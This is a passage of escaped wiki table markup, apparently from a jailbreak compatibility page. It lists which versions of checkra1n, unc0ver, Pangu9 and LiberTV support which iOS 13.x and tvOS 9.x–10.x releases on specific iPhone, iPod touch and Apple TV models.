| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;13&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.1.2&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;13&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.1.3&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;13&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.2&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;13&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.2.2&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;13&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.2.3&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;13&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.3&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;13&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.3.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;13&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.4&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.4.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.5&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 13.5.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&amp;lt;br&amp;gt;&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;&amp;lt;/ref&amp;gt;&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 13.6&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&amp;lt;br&amp;gt;&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;&amp;lt;/ref&amp;gt;&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references&amp;gt;&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;Check the &amp;quot;Allow untested iOS/iPadOS/tvOS versions&amp;quot; checkbox in the options view to bypass the version check.&amp;lt;/ref&amp;gt;&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;16&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[iPhone 6s]]&lt;br /&gt;
! [[iPhone 6s Plus]]&lt;br /&gt;
! [[iPhone SE (1st generation)]]&lt;br /&gt;
! [[iPhone 7]]&lt;br /&gt;
! [[iPhone 7 Plus]]&lt;br /&gt;
! [[iPhone 8]]&lt;br /&gt;
! [[iPhone 8 Plus]]&lt;br /&gt;
! [[iPhone X]]&lt;br /&gt;
! [[iPhone XR]]&lt;br /&gt;
! [[iPhone XS]]&lt;br /&gt;
! [[iPhone XS Max]]&lt;br /&gt;
! [[iPhone 11]]&lt;br /&gt;
! [[iPhone 11 Pro]]&lt;br /&gt;
! [[iPhone 11 Pro Max]]&lt;br /&gt;
! [[iPhone SE (2nd generation)]]&lt;br /&gt;
! [[iPod touch (7th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.0&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;20&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;14&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;14&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.1.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;14&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.1.2&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;14&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.1.3&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;14&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.2&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;14&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.2.2&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;14&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.2.3&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;14&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.3&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;14&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.3.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;14&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.4&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;7&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;16&amp;quot; {{yes}} &lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.4.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;7&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;16&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.5&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;7&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;16&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 13.5.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&amp;lt;br&amp;gt;&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;&amp;lt;/ref&amp;gt;&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;7&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| 13.6&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&amp;lt;br&amp;gt;&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;&amp;lt;/ref&amp;gt;&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;7&amp;quot; {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references&amp;gt;&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;Check the &amp;quot;Allow untested iOS/iPadOS/tvOS versions&amp;quot; checkbox in the options view to bypass the version check.&amp;lt;/ref&amp;gt;&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== tvOS ===&lt;br /&gt;
==== 9.x ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | tvOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! Device&lt;br /&gt;
|-&lt;br /&gt;
! [[J42dAP|Apple TV (4th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| 9.0&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Pangu9]]&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 1.0.0&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 9.0.1&lt;br /&gt;
|-&lt;br /&gt;
| 9.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;5&amp;quot; | No Tool Available&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 9.1.1&lt;br /&gt;
|-&lt;br /&gt;
| 9.2&lt;br /&gt;
|-&lt;br /&gt;
| 9.2.1&lt;br /&gt;
|-&lt;br /&gt;
| 9.2.2&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==== 10.x ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | tvOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! Device&lt;br /&gt;
|-&lt;br /&gt;
! [[J42dAP|Apple TV (4th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| 10.0&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | [[LiberTV]]&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 1.0&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 10.0.1&lt;br /&gt;
|-&lt;br /&gt;
| 10.1&lt;br /&gt;
|-&lt;br /&gt;
| 10.1.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;3&amp;quot; | No Tool Available&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 10.2&lt;br /&gt;
|-&lt;br /&gt;
| 10.2.1&lt;br /&gt;
|-&lt;br /&gt;
